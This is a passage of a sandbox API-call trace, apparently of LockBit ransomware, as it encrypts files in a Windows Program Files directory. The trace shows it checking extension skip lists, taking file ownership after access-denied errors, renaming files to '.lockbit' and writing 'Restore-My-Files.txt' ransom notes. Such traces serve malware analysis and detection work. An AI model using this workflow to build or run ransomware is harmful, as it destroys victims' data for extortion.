[0078.071] lstrcmpiW (lpString1=".exe", lpString2=".avi") returned 1 [0078.071] lstrcmpiW (lpString1=".ani", lpString2=".avi") returned -1 [0078.071] lstrcmpiW (lpString1=".adv", lpString2=".avi") returned -1 [0078.071] lstrcmpiW (lpString1=".theme", lpString2=".avi") returned 1 [0078.071] lstrcmpiW (lpString1=".msi", lpString2=".avi") returned 1 [0078.071] lstrcmpiW (lpString1=".msp", lpString2=".avi") returned 1 [0078.071] lstrcmpiW (lpString1=".com", lpString2=".avi") returned 1 [0078.071] lstrcmpiW (lpString1=".diagpkg", lpString2=".avi") returned 1 [0078.071] lstrcmpiW (lpString1=".nls", lpString2=".avi") returned 1 [0078.071] lstrcmpiW (lpString1=".diagcab", lpString2=".avi") returned 1 [0078.071] lstrcmpiW (lpString1=".lock", lpString2=".avi") returned 1 [0078.071] lstrcmpiW (lpString1=".ocx", lpString2=".avi") returned 1 [0078.071] lstrcmpiW (lpString1=".mpa", lpString2=".avi") returned 1 [0078.071] lstrcmpiW (lpString1=".cpl", lpString2=".avi") returned 1 [0078.071] lstrcmpiW (lpString1=".mod", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".hta", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".icns", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".prf", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".rtp", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".diagcfg", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".msstyles", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".bin", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".shs", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".drv", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".wpx", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".bat", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".rom", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".msc", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".spl", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".ps1", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".msu", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".ics", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".key", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".mp3", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".reg", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".dll", lpString2=".avi") returned 1 [0078.072] lstrcmpiW (lpString1=".ini", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".idx", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".sys", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".ico", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".lnk", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".rdp", lpString2=".avi") returned 1 [0078.073] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0078.073] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="delete.avi") returned 1 [0078.073] lstrcmpiW (lpString1="ntldr", lpString2="delete.avi") returned 1 [0078.073] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="delete.avi") returned 1 [0078.073] lstrcmpiW (lpString1="bootsect.bak", lpString2="delete.avi") returned -1 [0078.073] lstrcmpiW (lpString1="autorun.inf", lpString2="delete.avi") returned -1 [0078.073] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0078.073] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned=".avi" [0078.073] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".7z", lpString2=".avi") returned -1 [0078.073] lstrcmpiW (lpString1=".ckp", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".dacpac", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".db", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".db-shm", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".db-wal", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".db3", lpString2=".avi") returned 1 [0078.073] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".dbc", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".dbs", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".dbt", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".dbv", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".frm", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".mdf", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".mrg", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".mwb", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".myd", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".ndf", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".qry", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".sdb", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".sdf", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".sql", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".sqlite", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".sqlite3", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".sqlitedb", lpString2=".avi") returned 1 [0078.074] lstrcmpiW (lpString1=".tmd", lpString2=".avi") returned 1 [0078.074] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.lockbit") returned 76 [0078.074] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0078.074] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.lockbit")) returned 0 [0078.142] GetLastError () returned 0x5 [0078.142] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0078.143] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0078.143] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0078.143] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0078.143] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0078.143] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0078.144] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0078.144] NtQueryInformationFile (in: FileHandle=0x3b4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0078.154] NtClose (Handle=0x3b4) returned 0x0 [0078.154] RtlFreeAnsiString (AnsiString="\\") [0078.154] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b4) returned 1 [0078.154] malloc (_Size=0x200) returned 0x53fcc0 [0078.154] GetTokenInformation (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0078.154] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.154] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.154] CloseHandle (hObject=0x3b4) returned 1 [0078.154] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0078.155] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0078.156] free (_Block=0x53fcc0) [0078.156] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0078.156] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.lockbit")) returned 1 [0078.157] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0078.157] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0078.157] malloc (_Size=0x40068) returned 0x3940048 [0078.157] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=224256) returned 1 [0078.157] ReadFile (in: hFile=0x3b4, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0078.159] GetLastError () returned 0x3e5 [0078.159] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0078.160] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0078.160] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0078.160] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="FlickLearningWizard.exe.mui", cAlternateFileName="")) returned 1 [0078.160] lstrcmpiW (lpString1=".", lpString2="FlickLearningWizard.exe.mui") returned -1 [0078.160] lstrcmpiW (lpString1="..", lpString2="FlickLearningWizard.exe.mui") returned -1 [0078.160] PathFindExtensionW (pszPath="FlickLearningWizard.exe.mui") returned=".mui" [0078.160] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0078.160] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0078.160] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0078.160] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0078.160] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0078.161] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0078.161] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0078.161] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0078.161] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0078.161] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0078.161] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0078.161] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0078.161] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0078.161] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.161] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0078.162] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0078.162] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FlickLearningWizard.exe.mui") returned 1 [0078.162] lstrcmpiW (lpString1="ntldr", lpString2="FlickLearningWizard.exe.mui") returned 1 [0078.162] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FlickLearningWizard.exe.mui") returned 1 [0078.162] lstrcmpiW (lpString1="bootsect.bak", lpString2="FlickLearningWizard.exe.mui") returned -1 [0078.162] lstrcmpiW (lpString1="autorun.inf", lpString2="FlickLearningWizard.exe.mui") returned -1 [0078.162] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0078.162] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned=".mui" [0078.162] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0078.162] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0078.162] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0078.162] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0078.163] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0078.163] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0078.163] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0078.163] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0078.163] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0078.163] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0078.163] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0078.163] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0078.163] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0078.163] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0078.163] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui.lockbit") returned 93 [0078.163] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.163] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui.lockbit")) returned 0 [0078.172] GetLastError () returned 0x5 [0078.172] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0078.172] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0078.173] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0078.173] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0078.173] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0078.173] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3bc, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0078.174] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0078.174] NtQueryInformationFile (in: FileHandle=0x3bc, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0078.185] NtClose (Handle=0x3bc) returned 0x0 [0078.185] RtlFreeAnsiString (AnsiString="\\") [0078.185] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3bc) returned 1 [0078.186] malloc (_Size=0x200) returned 0x53fcc0 [0078.186] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0078.186] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.186] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.186] CloseHandle (hObject=0x3bc) returned 1 [0078.186] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0078.186] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0078.187] free (_Block=0x53fcc0) [0078.187] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.187] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui.lockbit")) returned 1 [0078.188] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0078.188] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0078.188] malloc (_Size=0x40068) returned 0x206b860 [0078.188] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=8704) returned 1 [0078.188] ReadFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0078.193] GetLastError () returned 0x3e5 [0078.193] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0078.193] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0078.193] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0078.193] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc8723b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdc8723b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="InkObj.dll.mui", cAlternateFileName="")) returned 1 [0078.193] lstrcmpiW (lpString1=".", lpString2="InkObj.dll.mui") returned -1 [0078.193] lstrcmpiW (lpString1="..", lpString2="InkObj.dll.mui") returned -1 [0078.193] PathFindExtensionW (pszPath="InkObj.dll.mui") returned=".mui" [0078.193] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0078.193] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0078.193] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0078.194] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0078.194] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0078.194] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0078.194] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0078.194] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0078.194] lstrcmpiW 